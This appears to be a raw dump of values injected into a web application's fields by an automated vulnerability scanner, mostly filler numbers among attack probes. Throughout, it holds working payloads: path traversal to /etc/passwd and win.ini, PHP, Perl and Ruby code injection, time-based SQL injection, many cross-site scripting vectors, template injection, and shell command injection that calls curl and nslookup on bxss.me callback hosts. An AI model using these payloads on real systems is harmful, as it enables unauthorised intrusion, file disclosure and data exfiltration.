.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
Http://bxss.me/t/fit.txt
555
555
555
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
125f53eO
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
555
555
555
555
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
555
555
555
555
555
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
555
555
..\..\..\..\..\..\..\..\windows\win.ini
555
555
555
555
555
555
555
555
555
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
555
555
555
555
555
555
555
555
/../../../../../../../../../../boot.ini
555
'.print(md5(31337)).'
555
555
555
555
${@print(md5(31337))}\
555
555
../../../../../../../../../../windows/win.ini%00.jpg
555
555
${@print(md5(31337))}
555
555
555
C:\WINDOWS\system32\drivers\etc\hosts
555
";print(md5(31337));$a="
'+'A'.concat(70-3).concat(22*4).concat(108).concat(85).concat(119).concat(84)+(require'socket'
Socket.gethostbyname('hittd'+'okbhwfaweac78.bxss.me.')[3].to_s)+'
555
555
./555
';print(md5(31337));$a='
555
555
bxss.me
../555
555
555
"+"A".concat(70-3).concat(22*4).concat(110).concat(80).concat(103).concat(90)+(require"socket"
Socket.gethostbyname("hitdp"+"gfcrsmck19069.bxss.me.")[3].to_s)+"
555
555
c:/windows/win.ini
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
/etc/shells
555
555
555
file:///etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
Http://bxss.me/t/fit.txt
555
555
555
555
555
555
555
555
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
'.print(md5(31337)).'
555
555
555
555
${@print(md5(31337))}\
555
555
555
555
555
555
555
555
${@print(md5(31337))}
555
555
555
555
";print(md5(31337));$a="
555
555
555
555
555
555
555
555
555
555
555
555
555
555
';print(md5(31337));$a='
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitvo"."iqakjbta79c6c.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(67).chr(97).chr(90)."
555
'.gethostbyname(lc('hitpt'.'ackyzxmnd25cb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(72).chr(122).chr(75).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(117).concat(78).concat(110).concat(69)+(require'socket'
Socket.gethostbyname('hiteg'+'beieemcv7bb01.bxss.me.')[3].to_s)+'
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(99).concat(78).concat(105).concat(82)+(require"socket"
Socket.gethostbyname("hitfl"+"kjzqqqti95cbe.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitjf"."latxuixnffb3c.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(68).chr(112).chr(82)."
'.gethostbyname(lc('hitjt'.'pvfpsdfy3fe49.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(86).chr(108).chr(82).'
555
555
555
555
555
555
555
555
555
555
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
555
1
555
1
555
1
555
1
555
555
1
555
555
555
555
555
555
555
555
bxss.me
c:/windows/win.ini
/etc/shells
http://bxss.me/t/fit.txt%3F.jpg
1
Http://bxss.me/t/fit.txt
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
555
555
555
555
555
1
555
555
1
555
1
1
555
1
555
555
555
555
555
555
555
1
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
555
'.gethostbyname(lc('hitvc'.'kkyulriie35e6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(82).chr(118).chr(75).'
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
555
555
555
555
555
555
555
555
555
1
555
555
555
555
555
555
555
555
1
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(104).concat(79).concat(120).concat(82)+(require'socket'
Socket.gethostbyname('hitgc'+'aqyvrqbhc14e0.bxss.me.')[3].to_s)+'
"+"A".concat(70-3).concat(22*4).concat(106).concat(73).concat(101).concat(88)+(require"socket"
Socket.gethostbyname("hitzw"+"ucipjsyc3b7ca.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
1
555
555
555
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
@@Nzm87
1 ����%2527%2522
1'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lHamoEVT')) OR 728=(SELECT 728 FROM PG_SLEEP(15))--
555
Q0oqNnq1') OR 819=(SELECT 819 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
bxss.me
c:/windows/win.ini
1
/etc/shells
xXfCI5BU' OR 345=(SELECT 345 FROM PG_SLEEP(5.071))--
http://bxss.me/t/fit.txt%3F.jpg
1
Http://bxss.me/t/fit.txt
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
1
555
1
1<aF04J5N<
IHlN1Th0' OR 111=(SELECT 111 FROM PG_SLEEP(15))--
555
1
1
555
1<img sRc='http://attacker-9784/log.php?
1
555
555
1
555
1<aWK1PeF x=9246>
1
1
555
555
1
1
555
555
555
1
555
555
555
1<ifRAme sRc=9528.com></IfRamE>
555
1
555
555
1<W3XQSH>AXDEM[!+!]</W3XQSH>
555
555
1
-1)) OR 484=(SELECT 484 FROM PG_SLEEP(15))--
1
555
555
1BiXX8
<InvalidTag >Xo8i(9531)</ScRiPt>
555
1
555
555
555
555
1
1}body{zzz:Expre/**/SSion(Xo8i(9828))}
'.print(md5(31337)).'
555
${@print(md5(31337))}\
1
<a HrEF=jaVaScRiPT:>
555
1
${@print(md5(31337))}
<a HrEF=http://xss.bxss.me></a>
1
555
555
555
";print(md5(31337));$a="
-1)) OR 246=(SELECT 246 FROM PG_SLEEP(5.071))--
1
555
1
555
1<input autofocus onfocus=Xo8i(9620)>
';print(md5(31337));$a='
555
1
�<img zzz onmouseover=Xo8i(99411) //�>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
1
1<ScRiPt>Xo8i(9457)</sCripT>
555
555
555
1
1
555
555
1\u003CScRiPt\Xo8i(9994)\u003C/sCripT\u003E
1
555
555
1
555
%31%3C%53%63%52%69%50%74%20%3E%58%6F%38%69%289661%29%3C%2F%73%43%72%69%70%54%3E
1
1<img/src=">" onerror=alert(9818)>
1
555
555
555
../555
-1)) OR 142=(SELECT 142 FROM PG_SLEEP(15))--
1<img src=xyz OnErRor=Xo8i(9963)>
1
1
1
555
555
555
1<img src=//xss.bxss.me/t/dot.gif onload=Xo8i(9603)>
555
1
file:///etc/passwd
1
1
../../../../../../../../../../../../../../windows/win.ini
555
555
1<body onload=Xo8i(9752)>
../../../../../../../../../../../../../../etc/passwd
1
555
555
555
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9669'>
555
555
1
555
1<isindex type=image src=1 onerror=Xo8i(9195)>
555
1
1
555
1<svg
� onload=Xo8i(9426);>
1
555
555
-5) OR 623=(SELECT 623 FROM PG_SLEEP(15))--
1
1
1<InvalidTag
>Xo8i(9670)</ScRiPt>
555
555
1
1
555
555
555
555
555
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9409></ScRiPt>
555
555
1
555
1<InvalidTag
>Xo8i(9751)</ScRiPt>
".gethostbyname(lc("hitqe"."mjcfcuvd81818.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(79).chr(106).chr(72)."
555
555
1
'.gethostbyname(lc('hitxp'.'gjzjlswqdc48e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(108).chr(88).'
555
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%58%6F%38%69%28%39%39%37%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
555
1
555
555
-5 OR 271=(SELECT 271 FROM PG_SLEEP(15))--
1
1<InvalidTag>Xo8i(9278)</script>
1
1
1
555
555
555
1<WGF88K>IHKYM[!+!]</WGF88K>
1
555
555
555
555
1
1
1<InvalidTag >Xo8i(9233)</ScRiPt>
555
555
555
1
555
555
1
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
OhGtUwvf')); waitfor delay '0:0:15' --
555
1
1
555
dfb__${98991*97996}__::.x
1
1
555
555
1
1
dfb[[${98991*97996}]]xca
555
555
1
555
dfb{{98991*97996}}xca
555
1
1
1
555
zTcyAggv'); waitfor delay '0:0:15' --
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
1
'+'A'.concat(70-3).concat(22*4).concat(108).concat(89).concat(108).concat(74)+(require'socket'
Socket.gethostbyname('hitkz'+'mldrfttt54d17.bxss.me.')[3].to_s)+'
"+"A".concat(70-3).concat(22*4).concat(108).concat(82).concat(119).concat(88)+(require"socket"
Socket.gethostbyname("hitry"+"yfrouqmi5a5f2.bxss.me.")[3].to_s)+"
1
555
1
1
1
555
1
555
<th:t="${dfb}#foreach
555
1
1
555
555
1
nqePXmRr'); waitfor delay '0:0:15' --
1
1
<%={{={@{#{${dfb}}%>
1
555
bfgx4081%C0%BEz1%C0%BCz2a%90bcxhjl4081
bfg2596%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2596
1
19795987
'"()&%<zzz><InvalidTag >Xo8i(9664)</ScRiPt>
eLmzQazf'; waitfor delay '0:0:15' --
1
19610534
1
1
'"()&%<zzz><InvalidTag >qj79(9698)</ScRiPt>
1
1'"()&%<zzz><InvalidTag >Xo8i(9945)</ScRiPt>
1
1 waitfor delay '0:0:0' --
1 waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1" OR 3*2>(0+5+757-757) --
-1" OR 3*2<(0+5+757-757) --
-1" OR 3+757-757-1=0+0+0+1 --
-1" OR 2+757-757-1=0+0+0+1 --
-1' OR 3*2>(0+5+360-360) or 'T5WQesTO'='
-1' OR 3*2<(0+5+360-360) or 'T5WQesTO'='
-1' OR 3+360-360-1=0+0+0+1 or 'T5WQesTO'='
-1' OR 2+360-360-1=0+0+0+1 or 'T5WQesTO'='
-1' OR 3*2>(0+5+836-836) --
-1' OR 3*2<(0+5+836-836) --
-1' OR 3+836-836-1=0+0+0+1 --
-1' OR 2+836-836-1=0+0+0+1 --
-1 OR 3*2>(0+5+966-966)
-1 OR 3*2<(0+5+966-966)
-1 OR 3+966-966-1=0+0+0+1
-1 OR 2+966-966-1=0+0+0+1
-1 OR 3*2>(0+5+84-84) --
-1 OR 3*2<(0+5+84-84) --
-1 OR 3+84-84-1=0+0+0+1 --
-1 OR 2+84-84-1=0+0+0+1 --
1
555
555
1
555
555
555
555
555
555
555
555
555
555
1
555
555
bxss.me
1
c:/windows/win.ini
/etc/shells
http://bxss.me/t/fit.txt%3F.jpg
Http://bxss.me/t/fit.txt
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
555
555
555
555
1
555
555
555
555
555
555
555
555
555
1
555
555
';print(md5(31337));$a='
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
1
555
".gethostbyname(lc("hitbb"."xxpuscdh3fd44.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(86).chr(114).chr(71)."
555
../../../../../../../../../../../../../../etc/passwd
'.gethostbyname(lc('hitzu'.'qcgsguold9b23.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(72).chr(117).chr(78).'
555
555
555
555
555
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(110).concat(84).concat(115).concat(89)+(require'socket'
Socket.gethostbyname('hitcd'+'ltkpqdul273c0.bxss.me.')[3].to_s)+'
555
"+"A".concat(70-3).concat(22*4).concat(97).concat(69).concat(120).concat(67)+(require"socket"
Socket.gethostbyname("hitgc"+"gedvfoykeff2a.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
555
1
555
555
555
555
555
1
1
1
1
1
1<WUTJZG>DVM2T[!+!]</WUTJZG>
1059z7
<InvalidTag >WCrL(9241)</ScRiPt>
1}body{zzz:Expre/**/SSion(WCrL(9915))}
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=WCrL(9824)>
�<img zzz onmouseover=WCrL(94901) //�>
1<ScRiPt>WCrL(9407)</sCripT>
1\u003CScRiPt\WCrL(9265)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%57%43%72%4C%289405%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9390)>
1<img src=xyz OnErRor=WCrL(9309)>
1<img src=//xss.bxss.me/t/dot.gif onload=WCrL(9587)>
1<body onload=WCrL(9308)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9988'>
1<isindex type=image src=1 onerror=WCrL(9387)>
1<svg
� onload=WCrL(9173);>
1<InvalidTag
>WCrL(9712)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9021></ScRiPt>
1<InvalidTag
>WCrL(9906)</ScRiPt>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%57%43%72%4C%28%39%36%35%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>WCrL(9173)</script>
1<WHDRIO>7YEKG[!+!]</WHDRIO>
1<InvalidTag >WCrL(9140)</ScRiPt>
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
1
1
<%={{={@{#{${dfb}}%>
bfgx5359%C0%BEz1%C0%BCz2a%90bcxhjl5359
bfg8417%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8417
1
19124758
1
'"()&%<zzz><InvalidTag >WCrL(9227)</ScRiPt>
1
19260363
1
1
1'"()&%<zzz><InvalidTag >WCrL(9983)</ScRiPt>
1
1
1
1
1
1
555
555
555
555
555
555
..\..\..\..\..\..\..\..\windows\win.ini
555
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
/../../../../../../../../../../boot.ini
555
../../../../../../../../../../windows/win.ini%00.jpg
555
C:\WINDOWS\system32\drivers\etc\hosts
555
555
555
555
555
file:///etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
555
';print(md5(31337));$a='
../../../../../../../../../../../../../../etc/passwd
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitbg"."zibtewfw2aa09.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(90).chr(108).chr(81)."
555
555
555
555
'.gethostbyname(lc('hitxe'.'nlgzrhpg341a4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(82).chr(101).chr(67).'
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(98).concat(66).concat(99).concat(89)+(require'socket'
Socket.gethostbyname('hitgp'+'edkfewnzc81ad.bxss.me.')[3].to_s)+'
555
555
555
"+"A".concat(70-3).concat(22*4).concat(121).concat(84).concat(112).concat(83)+(require"socket"
Socket.gethostbyname("hitle"+"zllztlfoc1045.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'"()&%<zzz><InvalidTag >f520(9833)</ScRiPt>
1
1
1
1
1
1
1
1
1
1
19079769
1
1
1
1
1
1
1
'"()&%<zzz><InvalidTag >xBmc(9990)</ScRiPt>
1
1
1
1
1
1
1
1
1
1
1
1'"()&%<zzz><InvalidTag >xBmc(9330)</ScRiPt>
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
bxss.me
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
|(nslookup -q=cname hitryhziaqbsnb2788.bxss.me||curl hitryhziaqbsnb2788.bxss.me)
1
1
1
1
1
1
1
1
1
1
1
1
1
(nslookup -q=cname hitkouesqbcdy2fb31.bxss.me||curl hitkouesqbcdy2fb31.bxss.me))
bxss.me
1
1
1
1
1
c:/windows/win.ini
1
1
1
1
1
1
1
echo wnjuyf$()\ ptdsvq\nz^xyu||a #' &echo wnjuyf$()\ ptdsvq\nz^xyu||a #|" &echo wnjuyf$()\ ptdsvq\nz^xyu||a #
1
1
/etc/shells
1
;(nslookup -q=cname hitflqgzlipye984b1.bxss.me||curl hitflqgzlipye984b1.bxss.me)|(nslookup -q=cname hitflqgzlipye984b1.bxss.me||curl hitflqgzlipye984b1.bxss.me)&(nslookup -q=cname hitflqgzlipye984b1.bxss.me||curl hitflqgzlipye984b1.bxss.me)
1
1
http://bxss.me/t/fit.txt%3F.jpg
1
1
1
1
`(nslookup -q=cname hitmbstrlakrx12260.bxss.me||curl hitmbstrlakrx12260.bxss.me)`
Http://bxss.me/t/fit.txt
1
|(nslookup -q=cname hittuthdbhthn190a7.bxss.me||curl hittuthdbhthn190a7.bxss.me)
1
1
'.print(md5(31337)).'
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
&(nslookup -q=cname hitvwbdvelhjjb628b.bxss.me||curl hitvwbdvelhjjb628b.bxss.me)&'\"`0&(nslookup -q=cname hitvwbdvelhjjb628b.bxss.me||curl hitvwbdvelhjjb628b.bxss.me)&`'
1
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
&nslookup -q=cname hitebzcblaoyg87842.bxss.me&'\"`0&nslookup -q=cname hitebzcblaoyg87842.bxss.me&`'
1
1
1
1
1
1
$(nslookup -q=cname hitplprdmbgfr3cd07.bxss.me||curl hitplprdmbgfr3cd07.bxss.me)
1
1
1
1
1
1
1
1
1
1
(nslookup -q=cname hitjvmqmnjocm19488.bxss.me||curl hitjvmqmnjocm19488.bxss.me))
1
1
1
1
1
1
1
1
1
1
|echo cmhywc$()\ hkazta\nz^xyu||a #' |echo cmhywc$()\ hkazta\nz^xyu||a #|" |echo cmhywc$()\ hkazta\nz^xyu||a #
1
1
1
1
1
1
1
1
';print(md5(31337));$a='
1
1
&echo wyctqw$()\ ifygwt\nz^xyu||a #' &echo wyctqw$()\ ifygwt\nz^xyu||a #|" &echo wyctqw$()\ ifygwt\nz^xyu||a #
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1
1
1
1
1
1
1
echo yzlnzg$()\ iufqcf\nz^xyu||a #' &echo yzlnzg$()\ iufqcf\nz^xyu||a #|" &echo yzlnzg$()\ iufqcf\nz^xyu||a #
1
1
1
1
1
1
'.print(md5(31337)).'
1
1
1
1
1
${@print(md5(31337))}\
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
${@print(md5(31337))}
1
1
1
1
1
1
";print(md5(31337));$a="
1
1
1
1
1
1
1
1
1
1
file:///etc/passwd
1
1
1
1
1
1
1
';print(md5(31337));$a='
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1
1
1"||sleep(27*1000)*laicrj||"
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
1
1
1
1
1
1
1
1
1
1
1
1
${9999179+9999597}
1
1
1
1
1
1
1
1
1"&&sleep(27*1000)*xnvcxw&&"
1
1
1
1
1
1
1
1
1
1
./1
1
1
1'&&sleep(27*1000)*ikjlod&&'
1
1
1
1
1
1
'"()
1
1
${9999432+10000174}
1
1
../1
1
1
1
1<esi:include src="http://bxss.me/rpb.png"/>
1
1
1
1
1
1
1
1
1
1"||sleep(27*1000)*hhqvrv||"
1
1
1
1
1
1
1
1
1
1
1
1
1
'"()&%<zzz><InvalidTag >y22y(9229)</ScRiPt>
1
1
1
1
1
1
1
1
1
1
1oI9gBlzO
1
1
1'||sleep(27*1000)*hudtav||'
1
1
1
1
1
1
1
1
1NdlSvFQO
1
1
<!--
19480932
1
1"&&sleep(27*1000)*kwklxi&&"
1
1
1
1
1
1
file:///etc/passwd
1
1
1
1
1
1
1
1
^(#$!@#$)(()))******
'"()&%<zzz><InvalidTag >y22y(9522)</ScRiPt>
1
1
1
1
1
1
1
1
1'"()&%<zzz><InvalidTag >y22y(9246)</ScRiPt>
1
1
!(()&&!|*|*|
../../../../../../../../../../../../../../windows/win.ini
1
1
1'&&sleep(27*1000)*qiuozd&&'
1
1
1
1
1
1
1
1
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
1
1
1
1
1
1
1
1
1
'"()
1
1
)
1
1
1
1
1
".gethostbyname(lc("hitml"."xksefeiffe66a.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(66).chr(118).chr(77)."
1
1
1
1
1
1
1
1
1
1
'"
^(#$!@#$)(()))******
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
<!--
1
1
